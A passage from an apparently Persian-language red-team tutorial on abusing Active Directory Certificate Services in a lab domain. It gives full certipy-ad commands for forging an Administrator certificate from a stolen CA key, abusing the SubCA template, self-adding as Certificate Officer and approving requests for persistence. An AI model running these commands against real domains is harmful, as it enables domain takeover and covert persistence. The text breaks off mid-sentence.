\u062e\u0635\u0648\u0635\u06cc CA\u060c \u06af\u0648\u0627\u0647\u06cc\u200c\u0627\u06cc \u062c\u0639\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0628\u0647 \u0645\u0627 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0645\u0633\u062a\u0642\u06cc\u0645 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 Administrator \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0646\u06cc\u0645 \u2014 \u0628\u062f\u0648\u0646 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627\u06cc \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0642\u0627\u0644\u0628\u200c\u0647\u0627 (templates) \u06cc\u0627 \u06a9\u0646\u062a\u0631\u0644\u200c\u0647\u0627\u06cc \u0633\u06cc\u0627\u0633\u062a\u06cc (policy controls):<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad forge -ca-pfx ignite-DC01-CA.pfx -upn administrator@ignite.local<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc \u0645\u0639\u062a\u0628\u0631 \u0628\u0627 UPN \u0627\u062f\u0645\u06cc\u0646 \u062f\u0627\u0645\u0646\u0647 \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u062f\u0631 \u062a\u0645\u0627\u0645 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc Kerberos \u0648 TLS \u0642\u0627\u0628\u0644 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0646\u0648\u0639 \u06af\u0648\u0627\u0647\u06cc:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627\u06cc \u0642\u0627\u0644\u0628 \u0631\u0627 \u062f\u0648\u0631 \u0645\u06cc\u200c\u0632\u0646\u062f<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0628\u0647 \u0647\u06cc\u0686 \u0645\u062c\u0648\u0632 \u062c\u062f\u06cc\u062f\u06cc \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0646\u06cc\u0627\u0632 \u0646\u062f\u0627\u0631\u062f<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0648 \u0627\u0645\u06a9\u0627\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 Administrator \u0631\u0627 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u062f\u0627\u0626\u0645 \u0648 \u067e\u0646\u0647\u0627\u0646 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f\u2014even \u0627\u06af\u0631 \u062a\u0645\u0627\u0645 \u0631\u0648\u0634\u200c\u0647\u0627\u06cc \u062f\u06cc\u06af\u0631 \u0645\u0627\u0646\u062f\u06af\u0627\u0631\u06cc (persistence) \u062d\u0630\u0641 \u0634\u0648\u0646\u062f.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19904\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/26-300x50.png\" alt=\"\" width=\"528\" height=\"88\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/26-300x50.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/26-1024x169.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/26-768x127.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/26-150x25.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/26.png 1029w\" sizes=\"(max-width: 528px) 100vw, 528px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc<\/strong><strong> Subordinate CA <\/strong><strong>\u0627\u0632 \u0637\u0631\u06cc\u0642 \u0642\u0627\u0644\u0628 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0627\u0632 \u06cc\u06a9 \u0642\u0627\u0644\u0628 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 (vulnerable template) \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0627\u062c\u0627\u0632\u0647 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc Subordinate CA (SubCA) \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u0645\u0627 \u0628\u06cc\u0634 \u0627\u0632 \u067e\u06cc\u0634 \u062f\u0631 \u0632\u0646\u062c\u06cc\u0631\u0647 \u0627\u0639\u062a\u0645\u0627\u062f PKI \u062f\u0627\u0645\u0646\u0647 \u0646\u0641\u0648\u0630 \u06a9\u0646\u06cc\u0645 \u0648 \u0628\u0647 \u0628\u062e\u0634\u06cc \u0627\u0632 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0622\u0646 \u062a\u0628\u062f\u06cc\u0644 \u0634\u0648\u06cc\u0645:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad req -u raj -p Password@1 -ca ignite-DC01-CA -target 192.168.1.20 -template SubCA -upn administrator@ignite.local -dc-ip 192.168.1.20<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0628\u0627 \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0645\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0642\u0627\u0644\u0628 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 SubCA\u060c \u06af\u0648\u0627\u0647\u06cc\u200c\u0627\u06cc \u062f\u0631\u06cc\u0627\u0641\u062a \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0645\u0627 \u0631\u0627 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 CA \u0641\u0631\u0639\u06cc (Subordinate CA) \u062f\u0631 \u0632\u0646\u062c\u06cc\u0631\u0647 \u0627\u0639\u062a\u0645\u0627\u062f \u0645\u0639\u0631\u0641\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0645\u0648\u0642\u0639\u06cc\u062a \u0628\u0647 \u0645\u0627 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0627 \u062f\u0631 \u0645\u0631\u0627\u062d\u0644 \u0628\u0639\u062f\u06cc:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0645\u0633\u062a\u0642\u0644 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u0645\u0639\u062a\u0628\u0631 \u0635\u0627\u062f\u0631 \u06a9\u0646\u06cc\u0645<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0647\u0631 \u0647\u0648\u06cc\u062a\u06cc \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u06af\u0648\u0627\u0647\u06cc \u0635\u0627\u062f\u0631 \u06a9\u0646\u06cc\u0645 (\u0627\u0639\u0645 \u0627\u0632 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0639\u0627\u062f\u06cc \u06cc\u0627 \u0645\u062f\u06cc\u0631\u0627\u0646)<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0632\u0646\u062c\u06cc\u0631\u0647 \u0627\u0639\u062a\u0645\u0627\u062f \u062f\u0627\u0645\u0646\u0647 \u0631\u0627 \u062f\u0633\u062a\u200c\u06a9\u0627\u0631\u06cc \u06cc\u0627 \u06af\u0633\u062a\u0631\u0634 \u062f\u0647\u06cc\u0645 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0645\u062f\u0627\u062e\u0644\u0647 \u0645\u062c\u062f\u062f \u062f\u0631 CA \u0627\u0635\u0644\u06cc<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\"><strong>\u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0628\u0627 \u0628\u0647\u200c\u062f\u0633\u062a \u0622\u0648\u0631\u062f\u0646 \u0642\u0627\u0628\u0644\u06cc\u062a \u0639\u0645\u0644\u06a9\u0631\u062f \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 SubCA\u060c \u0645\u0647\u0627\u062c\u0645 \u0628\u0647 \u0646\u0648\u0639\u06cc &#8220;CA \u062f\u0631 \u0633\u0627\u06cc\u0647&#8221; \u062a\u0628\u062f\u06cc\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u062a\u0648\u0627\u0646\u0627\u06cc\u06cc \u062c\u0639\u0644 \u0648 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0645\u0639\u062a\u0628\u0631 \u0628\u0631\u0627\u06cc \u0647\u0631 \u0633\u0631\u0648\u06cc\u0633\u060c \u06a9\u0627\u0631\u0628\u0631 \u06cc\u0627 \u0633\u0631\u0648\u0631 \u0631\u0627 \u062f\u0627\u0631\u062f\u2014\u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0627\u0646\u062f\u06af\u0627\u0631\u06cc (persistence) \u0628\u0633\u06cc\u0627\u0631 \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u0648 \u0633\u0637\u062d \u0628\u0627\u0644\u0627\u06cc\u06cc \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19905\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/27-300x49.png\" alt=\"\" width=\"484\" height=\"79\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/27-300x49.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/27-1024x168.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/27-768x126.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/27-1536x252.png 1536w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/27-150x25.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/27.png 1844w\" sizes=\"(max-width: 484px) 100vw, 484px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062a\u0623\u06cc\u06cc\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a<\/strong><strong> SubCA (Approve the SubCA Request)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u062a\u0644\u0627\u0634 \u0645\u06cc\u200c\u06a9\u0646\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 \u06f2\u06f6 \u0631\u0627 \u0628\u0631\u0627\u06cc \u0635\u062f\u0648\u0631 SubCA \u062a\u0623\u06cc\u06cc\u062f \u06a9\u0646\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad ca -u raj -p Password@1 -ca ignite-DC01-CA -target 192.168.1.20 -issue-request 26 -dc-ip 192.168.1.20<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u06af\u0631 \u06a9\u0627\u0631\u0628\u0631 \u0645\u0648\u0631\u062f \u0646\u0638\u0631 \u062f\u0633\u062a\u0631\u0633\u06cc \u0644\u0627\u0632\u0645 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 Certificate Officer \u0646\u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f\u060c CA \u0627\u06cc\u0646 \u0639\u0645\u0644\u06cc\u0627\u062a \u0631\u0627 \u0628\u0627 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627\u06cc &#8220;Access Denied&#8221; \u0631\u062f \u062e\u0648\u0627\u0647\u062f \u06a9\u0631\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u06cc\u06a9\u06cc \u0627\u0632 \u0645\u0648\u0627\u0646\u0639 \u0631\u0627\u06cc\u062c \u062f\u0631 \u0641\u0631\u0622\u06cc\u0646\u062f \u0627\u0631\u062a\u0642\u0627\u0621 \u0628\u0647 Subordinate CA \u0631\u0627 \u0646\u0634\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/span><br \/>\n<span style=\"font-size: 10pt\">\u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u062a\u0648\u0627\u0646\u0646\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0631\u0627 \u0628\u0627 \u0645\u0648\u0641\u0642\u06cc\u062a \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u0646\u062f\u060c \u0627\u0645\u0627 \u0633\u06cc\u0633\u062a\u0645 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc (CA) \u0645\u062c\u0648\u0632 \u062a\u0623\u06cc\u06cc\u062f (approval) \u0622\u0646 \u0631\u0627 \u0641\u0642\u0637 \u0628\u0647 \u062f\u0627\u0631\u0646\u062f\u06af\u0627\u0646 \u0646\u0642\u0634\u200c\u0647\u0627\u06cc \u062e\u0627\u0635 \u0645\u0627\u0646\u0646\u062f Certificate Officer \u0645\u062d\u062f\u0648\u062f \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0646\u062a\u06cc\u062c\u0647\u060c \u0628\u062f\u0648\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0646\u0627\u0633\u0628\u060c \u0627\u0645\u06a9\u0627\u0646 \u0635\u062f\u0648\u0631 \u0646\u0647\u0627\u06cc\u06cc \u06af\u0648\u0627\u0647\u06cc SubCA \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f\u060c \u062d\u062a\u06cc \u0627\u06af\u0631 \u0645\u0631\u0627\u062d\u0644 \u0642\u0628\u0644 \u0628\u0647\u200c\u062f\u0631\u0633\u062a\u06cc \u0627\u0646\u062c\u0627\u0645 \u0634\u062f\u0647 \u0628\u0627\u0634\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0633\u0627\u0632\u0648\u06a9\u0627\u0631 \u06cc\u06a9\u06cc \u0627\u0632 \u0645\u0639\u062f\u0648\u062f \u06a9\u0646\u062a\u0631\u0644\u200c\u0647\u0627\u06cc \u062d\u06cc\u0627\u062a\u06cc \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc SubCA \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0645\u062d\u0633\u0648\u0628 \u0645\u06cc\u200c\u0634\u0648\u062f. Red Team\u0647\u0627 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u062a\u0644\u0627\u0634 \u06a9\u0646\u0646\u062f \u0628\u0627 \u0627\u0631\u062a\u0642\u0627\u0621 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc \u06cc\u0627 \u062a\u0632\u0631\u06cc\u0642 \u062e\u0648\u062f \u0628\u0647 \u06af\u0631\u0648\u0647\u200c\u0647\u0627\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a\u06cc \u0645\u0631\u062a\u0628\u0637\u060c \u0627\u06cc\u0646 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a \u0631\u0627 \u062f\u0648\u0631 \u0628\u0632\u0646\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19906\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/28-300x31.png\" alt=\"\" width=\"484\" height=\"50\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/28-300x31.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/28-1024x106.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/28-768x80.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/28-150x16.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/28.png 1454w\" sizes=\"(max-width: 484px) 100vw, 484px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0627\u0641\u0632\u0648\u062f\u0646 \u06a9\u0627\u0631\u0628\u0631 \u0628\u0647<\/strong><strong> Certificate Officers (Add User as a Certificate Officer)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u06a9\u0627\u0631\u0628\u0631 raj \u0631\u0627 \u0628\u0647 \u06af\u0631\u0648\u0647 Certificate Officers \u0627\u0636\u0627\u0641\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u0628\u0647 \u0627\u0648 \u0627\u062e\u062a\u06cc\u0627\u0631\u0627\u062a \u0645\u062f\u06cc\u0631\u06cc\u062a\u06cc \u062f\u0631 CA \u0634\u0627\u0645\u0644 \u062a\u0623\u06cc\u06cc\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627\u060c \u062a\u063a\u06cc\u06cc\u0631 \u0642\u0627\u0644\u0628\u200c\u0647\u0627 \u0648 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0645\u06cc\u200c\u062f\u0647\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad ca -ca ignite-DC01-CA -u raj -p Password@1 -dc-ip 192.168.1.20 -add-officer raj<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong><strong>:<br \/>\n<\/strong>\u0628\u0627 \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u06a9\u0627\u0631\u0628\u0631 \u0628\u0647 \u06cc\u06a9\u06cc \u0627\u0632 \u0646\u0642\u0634\u200c\u0647\u0627\u06cc \u0633\u0637\u062d \u0628\u0627\u0644\u0627\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a\u06cc \u062f\u0631 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u062a\u0628\u062f\u06cc\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u06cc\u0646 \u0646\u0642\u0634 \u0628\u0647 \u0627\u0648 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0627:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc SubCA \u0631\u0627 \u062a\u0623\u06cc\u06cc\u062f \u06a9\u0646\u062f<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u0648 \u062a\u0635\u0648\u06cc\u0628 \u0646\u0645\u0627\u06cc\u062f<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc \u0631\u0627 \u062a\u0646\u0638\u06cc\u0645 \u06cc\u0627 \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u06a9\u0646\u062f<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062f\u062e\u0627\u0644\u062a \u0645\u0633\u062a\u0642\u06cc\u0645 \u0627\u062f\u0645\u06cc\u0646\u200c\u0647\u0627\u060c \u0632\u0646\u062c\u06cc\u0631\u0647 \u0627\u0639\u062a\u0645\u0627\u062f \u062f\u0627\u0645\u0646\u0647 \u0631\u0627 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0646\u062f<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc:<\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u0627\u0632 \u062d\u0645\u0644\u0647 \u0628\u0633\u06cc\u0627\u0631 \u062d\u06cc\u0627\u062a\u06cc \u0648 \u067e\u0631\u0645\u062e\u0627\u0637\u0631\u0647 \u0627\u0633\u062a\u060c \u0686\u0631\u0627\u06a9\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a\u06cc \u062f\u0627\u0626\u0645\u06cc \u0648 \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u0628\u0647 CA \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u067e\u0633 \u0627\u0632 \u0627\u06cc\u0646\u060c \u0645\u0647\u0627\u062c\u0645 \u0642\u0627\u062f\u0631 \u062e\u0648\u0627\u0647\u062f \u0628\u0648\u062f \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u062c\u0639\u0644\u06cc \u0648\u0644\u06cc \u06a9\u0627\u0645\u0644\u0627\u064b \u0645\u0639\u062a\u0628\u0631 \u0628\u0631\u0627\u06cc \u0647\u0631 \u0647\u0648\u06cc\u062a\u06cc \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0635\u0627\u062f\u0631 \u06a9\u0646\u062f \u2014 \u0628\u062f\u0648\u0646 \u0627\u06cc\u0646\u06a9\u0647 \u0627\u06cc\u0646 \u0641\u0639\u0627\u0644\u06cc\u062a\u200c\u0647\u0627 \u062a\u0648\u0633\u0637 \u0633\u0627\u0645\u0627\u0646\u0647\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0647\u200c\u0631\u0627\u062d\u062a\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19907\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/29-300x36.png\" alt=\"\" width=\"542\" height=\"65\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/29-300x36.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/29-1024x121.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/29-768x91.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/29-150x18.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/29.png 1214w\" sizes=\"(max-width: 542px) 100vw, 542px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u062f\u0627\u0645\u0647\u060c \u062a\u0644\u0627\u0634 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0645\u0639\u0644\u0642 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc SubCA \u0631\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0642\u0627\u0628\u0644\u06cc\u062a\u200c\u0647\u0627\u06cc \u062a\u0623\u06cc\u06cc\u062f (Approval Capabilities) \u06cc\u06a9 CA Officer \u06cc\u0627 Template Controller \u06a9\u0647 \u0628\u0647\u200c\u062e\u0637\u0631 \u0627\u0641\u062a\u0627\u062f\u0647 (Compromised) \u0627\u0633\u062a\u060c \u062a\u0623\u06cc\u06cc\u062f \u06a9\u0646\u06cc\u0645.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad ca -u raj -p Password@1 -ca ignite-DC01-CA -target 192.168.1.20 -issue-request 26 -dc-ip 192.168.1.20<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u062a\u0623\u06cc\u06cc\u062f \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u06af\u0648\u0627\u0647\u06cc SubCA \u0635\u0627\u062f\u0631 \u0634\u062f\u0647 \u0645\u0639\u062a\u0628\u0631 \u0627\u0633\u062a\u060c \u06a9\u0647 \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0627\u0645\u06a9\u0627\u0646 \u0627\u06cc\u062c\u0627\u062f Backdoor\u0647\u0627\u06cc \u0645\u0627\u0646\u062f\u06af\u0627\u0631 (Persistent) \u062f\u0631 \u0633\u0637\u062d Certification Authority (CA) \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19908\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/30-300x31.png\" alt=\"\" width=\"542\" height=\"56\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/30-300x31.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/30-1024x106.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/30-768x80.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/30-150x16.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/30.png 1452w\" sizes=\"(max-width: 542px) 100vw, 542px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u06af\u0648\u0627\u0647\u06cc<\/strong><strong> SubCA<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u06af\u0648\u0627\u0647\u06cc \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 Request ID 26 \u0631\u0627 \u06a9\u0647 \u067e\u06cc\u0634\u200c\u062a\u0631 \u062a\u0648\u0633\u0637 Certification Authority (CA) \u0648 \u062a\u062d\u062a \u0642\u0627\u0644\u0628 SubCA Template \u0635\u0627\u062f\u0631 \u0634\u062f\u0647\u060c 